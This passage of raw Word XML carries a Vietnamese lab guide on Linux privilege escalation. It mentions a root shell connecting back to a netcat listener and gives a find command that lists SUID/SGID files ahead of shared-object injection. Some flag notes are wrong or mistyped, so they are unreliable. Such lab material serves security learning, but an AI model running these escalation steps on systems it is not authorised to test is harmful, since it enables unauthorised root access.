      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phút).</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kết</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nối</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trở</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>với</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>người</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghe</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11528BDE" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CC8DE7" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="9" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106CB0FC" w14:textId="6B5ABE9B" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="99" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUID / SGID Executables - Shared Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE73C3" w14:textId="697D7659" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="119" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tìm tất cả các tệp thực thi SUID/SGID trên máy ảo Debian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D322374" w14:textId="43930B7E" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="119" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BCCDD" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ : cho phép tìm kiếm trong thư mục root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642F2FFF"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print hiển thị các thư mục trong kết quả tìm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01513144"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size +10M: tìm với dung lượng lớn hơn 10M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBB933" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-exex rm{} tìm xog xóa </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Trebuchet MS" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="auto"/>
          <w:w w:val="190"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🙂</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C958B" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="137" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-cmin -120 tìm file có sự thay đổi trong 2h gần đây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1EDCC"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atime 20 file mà được truy cập trong 20 ngày trước đây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C634E" w14:textId="6DBBF2F3" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="146" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-a : ẩn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E645261" w14:textId="77777777" w:rsidR="00665E18" w:rsidRPr="002D4A21" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="146" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2A8A04" w14:textId="0A565D48"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noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E09331D" wp14:editId="1D15C899">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1355090" cy="104775"/>
                <wp:effectExtent l="0" t="635" r="6985" b="889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04775"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 3547 1440"/>
                            <a:gd name="T1" fmla="*/ T0 w 2134"/>
                            <a:gd name="T2" fmla="+- 0 348 183"/>
                            <a:gd name="T3" fmla="*/ 348 h 165"/>
                            <a:gd name="T4" fmla="+- 0 1467 1440"/>
                            <a:gd name="T5" fmla="*/ T4 w 2134"/>
                            <a:gd name="T6" fmla="+- 0 348 183"/>
                            <a:gd name="T7" fmla="*/ 348 h 165"/>
                            <a:gd name="T8" fmla="+- 0 1463 1440"/>
                            <a:gd name="T9" fmla="*/ T8 w 2134"/>
                            <a:gd name="T10" fmla="+- 0 347 183"/>
                            <a:gd name="T11" fmla="*/ 347 h 165"/>
                            <a:gd name="T12" fmla="+- 0 1440 1440"/>
                            <a:gd name="T13" fmla="*/ T12 w 2134"/>
                            <a:gd name="T14" fmla="+- 0 321 183"/>
                            <a:gd name="T15" fmla="*/ 321 h 165"/>
                            <a:gd name="T16" fmla="+- 0 1440 1440"/>
                            <a:gd name="T17" fmla="*/ T16 w 2134"/>
                            <a:gd name="T18" fmla="+- 0 209 183"/>
                            <a:gd name="T19" fmla="*/ 209 h 165"/>
                            <a:gd name="T20" fmla="+- 0 1467 1440"/>
                            <a:gd name="T21" fmla="*/ T20 w 2134"/>
                            <a:gd name="T22" fmla="+- 0 183 183"/>
                            <a:gd name="T23" fmla="*/ 183 h 165"/>
                            <a:gd name="T24" fmla="+- 0 3547 1440"/>
                            <a:gd name="T25" fmla="*/ T24 w 2134"/>
                            <a:gd name="T26" fmla="+- 0 183 183"/>
                            <a:gd name="T27" fmla="*/ 183 h 165"/>
                            <a:gd name="T28" fmla="+- 0 3574 1440"/>
                            <a:gd name="T29" fmla="*/ T28 w 2134"/>
                            <a:gd name="T30" fmla="+- 0 209 183"/>
                            <a:gd name="T31" fmla="*/ 209 h 165"/>
                            <a:gd name="T32" fmla="+- 0 3574 1440"/>
                            <a:gd name="T33" fmla="*/ T32 w 2134"/>
                            <a:gd name="T34" fmla="+- 0 321 183"/>
                            <a:gd name="T35" fmla="*/ 321 h 165"/>
                            <a:gd name="T36" fmla="+- 0 3551 1440"/>
                            <a:gd name="T37" fmla="*/ T36 w 2134"/>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4" h="165">
                              <a:moveTo>
                                <a:pt x="2107" y="165"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="27" y="165"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="23" y="164"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="138"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="26"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="27" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2107" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2134" y="26"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2134" y="138"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2111"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09ED" id="Freeform 187" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:9.15pt;width:106.7pt;height:8.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3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" path="m2107,165l27,165r-4,-1l,138,,26,27,,2107,r27,26l2134,138r-23,26l2107,165xe" fillcolor="#868278" stroked="f">
                <v:fill opacity="9766f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1337945,220980;17145,220980;14605,220345;0,203835;0,132715;17145,116205;1337945,116205;1355090,132715;1355090,203835;1340485,220345" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="EB5757"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">\( -perm -u+s -o -perm -g+s \) </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: lọc theo quyền jj đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD9DC2" w14:textId="25362514" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00665E18" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="146" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="132"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/dev/null </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61FA951B" wp14:editId="67BD586A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="445135" cy="104775"/>
                <wp:effectExtent l="0" t="2540" r="2540" b="698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04775"/>
                          <a:chOff x="1440" y="183"/>
                          <a:chExt cx="701" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="185" name="Freeform 123"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="182"/>
                            <a:ext cx="701" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2114 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 701"/>
                              <a:gd name="T2" fmla="+- 0 348 183"/>
                              <a:gd name="T3" fmla="*/ 348 h 165"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
                              <a:gd name="T5" fmla="*/ T4 w 701"/>
                              <a:gd name="T6" fmla="+- 0 348 183"/>
                              <a:gd name="T7" fmla="*/ 348 h 165"/>
                              <a:gd name="T8" fmla="+- 0 1463 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 701"/>
                              <a:gd name="T10" fmla="+- 0 347 183"/>
                              <a:gd name="T11" fmla="*/ 347 h 165"/>
                              <a:gd name="T12" fmla="+- 0 1440 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 701"/>
                              <a:gd name="T14" fmla="+- 0 321 183"/>
                              <a:gd name="T15" fmla="*/ 321 h 165"/>
                              <a:gd name="T16" fmla="+- 0 1440 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 701"/>
                              <a:gd name="T18" fmla="+- 0 209 183"/>
                              <a:gd name="T19" fmla="*/ 209 h 165"/>
                              <a:gd name="T20" fmla="+- 0 1467 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 701"/>
                              <a:gd name="T22" fmla="+- 0 183 183"/>
                              <a:gd name="T23" fmla="*/ 183 h 165"/>
                              <a:gd name="T24" fmla="+- 0 2114 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 701"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 165"/>
                              <a:gd name="T28" fmla="+- 0 2141 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 701"/>
                              <a:gd name="T30" fmla="+- 0 209 183"/>
                              <a:gd name="T31" fmla="*/ 209 h 165"/>
                              <a:gd name="T32" fmla="+- 0 2141 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 701"/>
                              <a:gd name="T34" fmla="+- 0 321 183"/>
                              <a:gd name="T35" fmla="*/ 321 h 165"/>
                              <a:gd name="T36" fmla="+- 0 2118 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 701"/>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1" h="165">
                                <a:moveTo>
                                  <a:pt x="674" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="674" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="701" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="701" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="678"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24"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="182"/>
                            <a:ext cx="7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5095" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                                <w:t>/dev/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A951B" id="Group 184" o:spid="_x0000_s1029" style="position:absolute;margin-left:1in;margin-top:9.15pt;width:35.05pt;height:8.25pt;z-index:-251641856;mso-position-horizontal-relative:page" coordorigin="1440,183" coordsize="7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">
                <v:shape id="Freeform 123" o:spid="_x0000_s1030" style="position:absolute;left:1440;top:182;width:701;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7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" path="m674,165r-647,l23,164,,138,,26,27,,674,r27,26l701,138r-23,26l674,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="674,348;27,348;23,347;0,321;0,209;27,183;674,183;701,209;701,321;678,347" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
